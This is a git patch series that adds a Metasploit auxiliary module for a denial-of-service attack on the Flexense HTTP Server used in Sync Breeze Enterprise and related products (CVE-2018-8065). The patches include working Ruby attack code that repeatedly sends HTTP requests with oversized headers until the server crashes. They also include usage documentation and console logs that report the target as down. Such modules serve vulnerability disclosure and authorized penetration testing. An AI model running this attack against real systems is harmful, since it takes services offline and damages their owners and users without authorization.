From 0e4e260a0276306fd2117e7328302acabb8fa06c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Sun, 11 Mar 2018 23:07:50 +0300 Subject: [PATCH 1/9] Adding Sync Breeze Enterprise 10.6.24 DOS This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. Vulnerable version of the product can be downloaded here (http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe). After installing the software web server should be enabled via Options->Server->Enable web server on port. Module triggers a user space write access violation on syncbrs.exe memory region. Number of requests that will crash the server changes between 200-1000 depending on the OS version and system memory. --- .../dos/http/syncbreeze_enterprise_dos.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb new file mode 100644 index 0000000000..dd92f73490 --- /dev/null +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sync Breeze Enterprise 10.6.24 Denial Of Service', + 'Description' => %q{ + This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. + Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. + Sync Breeze Enterprise 10.6.24 version reportedly vulnerable. + }, + 'Author' => [ 'Ege Balci ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], + ], + 'DisclosureDate' => 'Mar 09 2018')) + + register_options( + [ + Opt::RPORT(80), + ]) + + end + + def run + + print_status("Sending HTTP DoS packets...") + trig = true + + begin + connect + disconnect + rescue + print_error("Unable to connect to #{rhost}:#{rport}") + trig = false + end + + while trig do + payload = "" + rnd = rand(4) + if rnd == 0 then + payload << "PUT /index.html HTTP/1.1\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" + elsif rnd == 1 then + payload << "POST /"+("A"*rand(8000))+" HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*\r\n\r\n" + elsif rnd == 2 then + payload << "POST /index.html HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla"+("A"*rand(8000))+"\n" + payload << "Accept: */*\r\n\r\n" + elsif rnd == 3 then + payload << "GET /index.html HTTP/0.9\n" + payload << "Host: localhost\n" + payload << "User-Agent: Mozilla\n" + payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" + end + + print_status("Request size: (#{payload.size}) byte") + begin + connect + sock.put(payload) + disconnect + rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("Unable to connect to #{rhost}:#{rport}") + break + rescue ::Errno::ECONNRESET,::Rex::ConnectionRefused + print_good("DoS successful #{rhost} is down !") + break + end + end + + end +end From d71b6bdf0d19afb0646f9075051f206466272ebe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Sun, 11 Mar 2018 23:27:46 +0300 Subject: [PATCH 2/9] Update syncbreeze_enterprise_dos.rb msftidy.rb adjustment. --- modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index dd92f73490..98b503aaf1 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -31,14 +31,13 @@ class MetasploitModule < Msf::Auxiliary end def run - print_status("Sending HTTP DoS packets...") trig = true begin connect disconnect - rescue + rescue print_error("Unable to connect to #{rhost}:#{rport}") trig = false end @@ -81,6 +80,5 @@ class MetasploitModule < Msf::Auxiliary break end end - end end From 420905137b464b270438e3261bda8c92bec23a7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 08:42:28 +0300 Subject: [PATCH 3/9] CVA added. --- modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index 98b503aaf1..9a0738840c 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -19,6 +19,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => 'Mar 09 2018')) From b7b09c5010229bc2bf83d98eb420b6a82dc6dd02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 20:30:15 +0300 Subject: [PATCH 4/9] Documentation added. --- .../dos/http/syncbreeze_enterprise_do.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md new file mode 100644 index 0000000000..6fd2de82b9 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md @@ -0,0 +1,63 @@ +## Description +This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. It is possible to trigger +a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. + + +## Vulnerable Application +According To publicly exploit Disclosure of Sync Breeze Enterprise v10.6.24 +this software is vulnerable to Denial Of Service. +read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 + +**Vulnerable Application Link** +http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe + +## Vulnerable Application Installation Setup. +Download Application : ```http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe``` + +**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** + +After the installation navigate to: ```Options->Server``` + +Check the box saying: ```Enable web server on port:...``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use auxiliary/dos/http/syncbreeze_enterprise_dos` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 +[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. +[+] 192.168.1.27:80 The target is vulnerable. +``` + 7. Do: `run` + 8. Web server will crash after 200-1000 request depending on the OS version and system memory. + +## Scenarios +**TESTED AGAINST WINDOWS 7/10** +``` +msf5 > use auxiliary/dos/http/syncbreeze_enterprise_dos +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rhost 192.168.1.27 +rhost => 192.168.1.27 +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 +rport => 80 +msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run + +[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 +[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. +[*] 192.168.1.27:80 - Sending HTTP DoS packets... +[*] 192.168.1.27:80 - Request size: (6667) byte +[*] 192.168.1.27:80 - Request size: (13990) byte +[*] 192.168.1.27:80 - Request size: (15797) byte +[*] 192.168.1.27:80 - Request size: (20369) byte +[*] 192.168.1.27:80 - Request size: (11119) byte +[*] 192.168.1.27:80 - Request size: (16293) byte +[*] 192.168.1.27:80 - Request size: (13830) byte +... +[+] 192.168.1.27:80 - DoS successful 192.168.1.27 is down ! +[*] Auxiliary module execution completed + +``` From 2950c84660acd6c3a38d5cdd8773e4330e502ffc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Mon, 12 Mar 2018 20:33:46 +0300 Subject: [PATCH 5/9] Better code. Added check function. Smaller & cleaner code. --- .../dos/http/syncbreeze_enterprise_dos.rb | 82 ++++++++----------- 1 file changed, 36 insertions(+), 46 deletions(-) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb index 9a0738840c..d0ae26e18c 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb @@ -4,8 +4,8 @@ ## class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2018-8065'], + [ 'CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => 'Mar 09 2018')) @@ -31,55 +31,45 @@ class MetasploitModule < Msf::Auxiliary end - def run - print_status("Sending HTTP DoS packets...") - trig = true - + def check begin connect - disconnect + sock.put("GET / HTTP/1.0\r\n\r\n") + res = sock.get + if res and res.include? 'Flexense HTTP Server v10.6.24' + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end rescue - print_error("Unable to connect to #{rhost}:#{rport}") - trig = false + Exploit::CheckCode::Safe + end + end + + def run + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end - while trig do - payload = "" - rnd = rand(4) - if rnd == 0 then - payload << "PUT /index.html HTTP/1.1\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" - elsif rnd == 1 then - payload << "POST /"+("A"*rand(8000))+" HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*\r\n\r\n" - elsif rnd == 2 then - payload << "POST /index.html HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla"+("A"*rand(8000))+"\n" - payload << "Accept: */*\r\n\r\n" - elsif rnd == 3 then - payload << "GET /index.html HTTP/0.9\n" - payload << "Host: localhost\n" - payload << "User-Agent: Mozilla\n" - payload << "Accept: */*"+("A"*rand(8000))+"\r\n\r\n" - end - - print_status("Request size: (#{payload.size}) byte") - begin - connect - sock.put(payload) - disconnect - rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("Unable to connect to #{rhost}:#{rport}") - break - rescue ::Errno::ECONNRESET,::Rex::ConnectionRefused - print_good("DoS successful #{rhost} is down !") - break - end + print_status('Triggering the vulnerability') + loop do + payload = "" + payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n" + payload << "Host: 127.0.0.1\n" + payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n" + payload << "Accept: "+('A'*rand(8000))+"\r\n\r\n" + begin + connect + sock.put(payload) + disconnect + rescue ::Rex::ConnectionTimeout + print_error('Connection timeout !') + rescue ::Errno::ECONNRESET + print_error('Connection reset !') + rescue ::Rex::ConnectionRefused + print_good("DoS successful #{rhost} is down !") + break + end end end end From 177eca30e8c08dd2abe45f79409ec731ab87a19b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Thu, 15 Mar 2018 12:39:22 +0300 Subject: [PATCH 6/9] Usage instructions adjusted. --- .../dos/http/syncbreeze_enterprise_do.md | 19 ++++--------------- 1 file changed, 4 insertions(+), 15 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md index 6fd2de82b9..643dc5ec80 100644 --- a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md +++ b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md @@ -29,9 +29,7 @@ Check the box saying: ```Enable web server on port:...``` 5. Do: `set rhost ` 6. Do: `check` ``` -[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 -[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. -[+] 192.168.1.27:80 The target is vulnerable. +[+] 192.168.1.20:80 The target is vulnerable. ``` 7. Do: `run` 8. Web server will crash after 200-1000 request depending on the OS version and system memory. @@ -46,18 +44,9 @@ msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 rport => 80 msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run -[*] 192.168.1.27:80 - Checking connection to 192.168.1.27:80 -[+] 192.168.1.27:80 - Sync Breeze Enterprise v10.6.24 verified. -[*] 192.168.1.27:80 - Sending HTTP DoS packets... -[*] 192.168.1.27:80 - Request size: (6667) byte -[*] 192.168.1.27:80 - Request size: (13990) byte -[*] 192.168.1.27:80 - Request size: (15797) byte -[*] 192.168.1.27:80 - Request size: (20369) byte -[*] 192.168.1.27:80 - Request size: (11119) byte -[*] 192.168.1.27:80 - Request size: (16293) byte -[*] 192.168.1.27:80 - Request size: (13830) byte -... -[+] 192.168.1.27:80 - DoS successful 192.168.1.27 is down ! +[*] 192.168.1.20:80 - Triggering the vulnerability +[-] 192.168.1.20:80 - Connection reset ! +[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! [*] Auxiliary module execution completed ``` From e52b065b2600ae64a3bdd170420a6c04b02b0e62 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Fri, 25 May 2018 20:18:54 +0300 Subject: [PATCH 7/9] Manual rewritten for flexense_http_server_dos --- .../dos/http/flexense_http_server_dos.md | 67 +++++++++++++++++++ .../dos/http/syncbreeze_enterprise_do.md | 52 -------------- 2 files changed, 67 insertions(+), 52 deletions(-) create mode 100644 documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md delete mode 100644 documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md new file mode 100644 index 0000000000..d930453a26 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md @@ -0,0 +1,67 @@ +## Description +This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger +a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. + + +## Vulnerable Application +According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24 +Following list of softwares are vulnerable to Denial Of Service. +read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 + + +DiskBoss Enterprise <= v9.0.18 +Sync Breeze Enterprise <= v10.6.24 +Disk Pulse Enterprise <= v10.6.24 +Disk Savvy Enterprise <= v10.6.24 +Dup Scout Enterprise <= v10.6.24 +VX Search Enterprise <= v10.6.24 + + +**Vulnerable Application Link** +http://www.diskboss.com/downloads.html +http://www.syncbreeze.com/downloads.html +http://www.diskpulse.com/downloads.html +http://www.disksavvy.com/downloads.html +http://www.dupscout.com/downloads.html + + +## Vulnerable Application Installation Setup. +All Flexense applications that are listed above can be installed by following these steps. + +Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe``` + +**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** + +After the installation navigate to: ```Options->Server``` + +Check the box saying: ```Enable web server on port:...``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use auxiliary/dos/http/flexense_http_server_dos` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[+] 192.168.1.20:80 The target is vulnerable. +``` + 7. Do: `run` + 8. Web server will crash after 200-1000 request depending on the OS version and system memory. + +## Scenarios +**TESTED AGAINST WINDOWS 7/10** +``` +msf5 > use auxiliary/dos/http/flexense_http_server_dos +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 +rhost => 192.168.1.27 +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80 +rport => 80 +msf5 auxiliary(dos/http/flexense_http_server_dos) > run + +[*] 192.168.1.20:80 - Triggering the vulnerability +[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! +[*] Auxiliary module execution completed + +``` diff --git a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md b/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md deleted file mode 100644 index 643dc5ec80..0000000000 --- a/documentation/modules/auxiliary/dos/http/syncbreeze_enterprise_do.md +++ /dev/null @@ -1,52 +0,0 @@ -## Description -This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. It is possible to trigger -a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. - - -## Vulnerable Application -According To publicly exploit Disclosure of Sync Breeze Enterprise v10.6.24 -this software is vulnerable to Denial Of Service. -read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 - -**Vulnerable Application Link** -http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe - -## Vulnerable Application Installation Setup. -Download Application : ```http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.6.24.exe``` - -**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** - -After the installation navigate to: ```Options->Server``` - -Check the box saying: ```Enable web server on port:...``` - -## Verification Steps - - 1. Install the application - 2. Start msfconsole - 3. Do: `use auxiliary/dos/http/syncbreeze_enterprise_dos` - 4. Do: `set rport ` - 5. Do: `set rhost ` - 6. Do: `check` -``` -[+] 192.168.1.20:80 The target is vulnerable. -``` - 7. Do: `run` - 8. Web server will crash after 200-1000 request depending on the OS version and system memory. - -## Scenarios -**TESTED AGAINST WINDOWS 7/10** -``` -msf5 > use auxiliary/dos/http/syncbreeze_enterprise_dos -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rhost 192.168.1.27 -rhost => 192.168.1.27 -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > set rport 80 -rport => 80 -msf5 auxiliary(dos/http/syncbreeze_enterprise_dos) > run - -[*] 192.168.1.20:80 - Triggering the vulnerability -[-] 192.168.1.20:80 - Connection reset ! -[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! -[*] Auxiliary module execution completed - -``` From 3ab75267866ea9a46257277e757cda3a6436a935 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ege=20Balc=C4=B1?= Date: Fri, 25 May 2018 20:22:51 +0300 Subject: [PATCH 8/9] Name & description Change Exploit::CheckCode changed to Unknown as suggested. --- ...e_enterprise_dos.rb => flexense_http_server_dos.rb} | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename modules/auxiliary/dos/http/{syncbreeze_enterprise_dos.rb => flexense_http_server_dos.rb} (87%) diff --git a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb similarity index 87% rename from modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb rename to modules/auxiliary/dos/http/flexense_http_server_dos.rb index d0ae26e18c..f045bd694e 100644 --- a/modules/auxiliary/dos/http/syncbreeze_enterprise_dos.rb +++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb @@ -9,11 +9,11 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Sync Breeze Enterprise 10.6.24 Denial Of Service', + 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ - This module triggers a Denial of Service vulnerability in the Sync Breeze Enterprise HTTP server. + This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. - Sync Breeze Enterprise 10.6.24 version reportedly vulnerable. + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci ' ], 'License' => MSF_LICENSE, @@ -39,10 +39,10 @@ class MetasploitModule < Msf::Auxiliary if res and res.include? 'Flexense HTTP Server v10.6.24' Exploit::CheckCode::Vulnerable else - Exploit::CheckCode::Safe + Exploit::CheckCode::Unknown end rescue - Exploit::CheckCode::Safe + Exploit::CheckCode::Unknown end end From 026b22d061ccd6194bef22c92debb968cc6a2d1d Mon Sep 17 00:00:00 2001 From: Aaron Soto Date: Tue, 29 May 2018 16:09:27 -0500 Subject: [PATCH 9/9] Refined packet sizes and counts, improved error messages --- .../dos/http/flexense_http_server_dos.rb | 42 +++++++++++++------ 1 file changed, 29 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/dos/http/flexense_http_server_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb index f045bd694e..dd77806d27 100644 --- a/modules/auxiliary/dos/http/flexense_http_server_dos.rb +++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb @@ -12,7 +12,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. - Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. + Vulnerability caused by a user mode write access memory violation and can be triggered with + rapidly sending variety of HTTP requests with long HTTP header values. + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci ' ], @@ -27,6 +29,8 @@ class MetasploitModule < Msf::Auxiliary register_options( [ Opt::RPORT(80), + OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), + OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) ]) end @@ -37,39 +41,51 @@ class MetasploitModule < Msf::Auxiliary sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get if res and res.include? 'Flexense HTTP Server v10.6.24' - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Appears else - Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end + rescue Rex::ConnectionRefused + print_error("Target refused the connection") + Exploit::CheckCode::Unknown rescue + print_error("Target did not respond to HTTP request") Exploit::CheckCode::Unknown end end def run - unless check == Exploit::CheckCode::Vulnerable + unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end - print_status('Triggering the vulnerability') + size = datastore['PacketSize'].to_i + print_status("Starting with packets of #{size}-byte strings") + + count = 0 loop do payload = "" - payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n" - payload << "Host: 127.0.0.1\n" - payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n" - payload << "Accept: "+('A'*rand(8000))+"\r\n\r\n" + payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" + payload << "Host: 127.0.0.1\r\n" + payload << "Accept: "+('A' * size)+"\r\n" + payload << "\r\n\r\n" begin connect sock.put(payload) disconnect + count += 1 + break if count==datastore['PacketCount'] + rescue ::Rex::InvalidDestination + print_error('Invalid destination! Continuing...') rescue ::Rex::ConnectionTimeout - print_error('Connection timeout !') + print_error('Connection timeout! Continuing...') rescue ::Errno::ECONNRESET - print_error('Connection reset !') + print_error('Connection reset! Continuing...') rescue ::Rex::ConnectionRefused - print_good("DoS successful #{rhost} is down !") - break + print_good("DoS successful after #{count} packets with #{size}-byte headers") + return true end end + print_error("DoS failed after #{count} packets of #{size}-byte strings") end end